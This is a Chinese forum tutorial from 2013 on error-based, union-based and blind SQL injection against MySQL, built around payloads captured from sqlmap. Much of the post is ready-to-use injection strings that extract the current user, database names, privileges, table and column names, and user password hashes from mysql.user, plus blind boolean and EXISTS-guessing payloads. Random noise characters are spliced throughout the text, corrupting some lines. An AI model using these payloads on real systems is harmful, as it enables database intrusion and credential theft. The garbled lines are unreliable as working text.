放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
% Q$ Q" s* }$ M- V8 F. s: Z% t * ]9 G8 b1 L% C2 A- z- ]4 x( X e3 K# h
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表5 |' L6 T0 l E+ b6 h8 y% n
+ \0 U6 S- q/ n O; E2 A
分类标准 分类 备注: C- J9 T# C3 t' x
按字段类型 整型注入,字符型注入 . f! G$ `% U; f! H9 ?
按出现的位置 get注入,post注入,cookie注入,http header注入 4 r3 L4 P `% f+ C& z
然而高级注入是这样的
: ^3 F3 Q3 H2 t1 {$ G; V* y
2 T( \& V; u1 v高级注入分类 条件
8 q& I; H% U+ L8 l( N) Derror-based sql 数据库的错误回显可以返回,存在数据库,表结构/ c; [; ?* e) H8 K7 e9 E n& M
union-based sql 能够使用union,存在数据库,表结构
/ @/ {2 N1 S- l; h" Bblind sql 存在注入0 N8 {2 w; \( F0 Y( G* D0 o& W; v
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
% T8 u) ?+ S1 n6 x+ w3 T( C* |
$ O$ q' ]) _7 {3 @0 a2 M好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
7 j5 I) q; a' F, X2 l' F) G
! f" X2 T1 J/ h附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。# h# ~2 r5 ?) F1 o
2 X2 u& c$ w* @0 Z这里用mysql说明
2 W& d+ l A' `! h
% K! ]+ E4 _& [, ye注入坛子里很多了,请看戳我或者再戳我
/ l6 z7 v- z+ _! w
4 \6 B& r+ c; D+ _5 F! R/ B/ mu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的& d* `; G# ^! o2 u5 R0 K
- @" q: f* f( e. x获取当前数据库用户名: N0 E/ ^. M, i9 ^5 `- \& ]- h! _
) b1 U; M$ m2 ?; g% H# G
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
+ A4 ~9 W+ q1 k% ]AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL% P1 ~: o6 ]; p% }5 w8 w7 _7 L
L, NULL#
" [- I. V9 |* [) s; A9 ^9 `注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。$ y' a" Z7 e4 j9 \
# d( x4 r2 D* z' h2 s
获取数据库名6 R" E* F. ?9 ?/ @% t
0 s2 G2 c+ C* b/ W# FUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
3 U) f3 o9 z" J- ~- u$ k获取所有用户名
& N+ D ]. d! N \- R; k) V3 z 7 j: j% m O" Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#/ s% w3 X( Y# q. o& `- `
查看当前用户权限
" F2 L5 r! {2 Q& k: C7 M + e5 \* g4 u t0 u
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#4 S0 l* _4 x; G6 G! X. c: F9 k
尝试获取密码,当然需要有能读mysql数据库的权限: ]( V U0 r) k( x5 i
% d; Z5 J; ~2 d% A7 fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#; q0 b E3 s( l8 x& {1 x' p1 U
获取表名,limit什么的自己搞啦
5 } r: U8 r7 y" f 5 J; ~* O* T1 p9 |+ z7 p1 I
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
- {3 X* ` Y0 x/ M获取字段名及其类型
' s( U- q$ X) x* U! T# o& A) lUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
" s+ R5 H& Q6 H' ^# Z0 [; L" l ) S) ~6 T, L `/ m- o' Y
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
4 X& b" O* p0 A# y
* w- A8 j& o$ j7 \% A# w0 O1 r9 |; N如:
6 k2 u7 s' R" k$ E( {% H获取当前用户名2 N# p2 O3 s" l- I1 L
$ s U$ b! z7 i$ W& bAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116* d- s y) J, A6 z
获取当前数据库1 P+ s( E' ~) r E7 k) {
6 G) |, ?, o" G1 r( X& c+ XAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106* a+ i. Q' i$ ^) g' U, h
获取表名
5 q5 |" a, G+ |& j; o* p3 F
* a; _7 {3 F% {6 r" l2 [/ L1 kAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 517 h# Z4 }5 t% r" \6 W% I- ?
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。$ S9 ? F @5 V0 T; S
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。1 b" d7 D- Z' c- }6 n8 X
爆表
% D& {7 j r! h! l8 D* q4 F/ a4 d9 q ' |% ]7 _/ C- q Y# p
AND EXISTS(select * from table)
, N/ q9 }6 X# U2 d* N爆字段* {) n4 h2 w+ t! p! w2 J
' A9 [; I5 S3 O p h* f
AND EXISTS(select pwd from table)
/ B& z2 b7 y d6 p& ~: X盲注的变化就比较多了,由于篇幅,只是举个例子而已。' y& m9 ?+ @& ~
! R4 @0 p. T8 Y" V! l. `本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
}6 u1 V. T4 u6 D/ k% T |
发表于 2013-7-16 20:31:26
收藏
支持
反对